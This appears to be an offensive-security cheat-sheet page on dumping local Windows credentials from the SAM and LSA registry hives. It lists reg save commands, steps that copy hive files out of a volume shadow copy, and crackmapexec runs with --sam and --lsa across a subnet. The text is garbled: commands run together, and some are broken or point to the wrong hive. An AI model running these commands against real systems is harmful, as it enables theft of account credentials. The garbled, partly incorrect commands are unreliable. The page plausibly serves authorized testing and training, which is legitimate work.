Local credentials (SAM and LSA)
Overview
Hive
Details
Obtaining the SAM and LSA database
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\system securitywmic shadowcopy call create Volume='C:\'vssadmin list shadowscopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\offsec.corp1\Downloads\samcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\offsec.corp1\Downloads\systemcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\offsec.corp1\Downloads\securitycopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\offsec.corp1\Downloads\systemcrackmapexec smb 192.168.1.0/24 -u {username} -p {password} --samcrackmapexec smb 192.168.1.0/24 -u {username} -p {password} --lsaFull memory dump and Volatility
Using volatility to read memory and obtain credentials
Decoding the SAM and LSA database
References
Last updated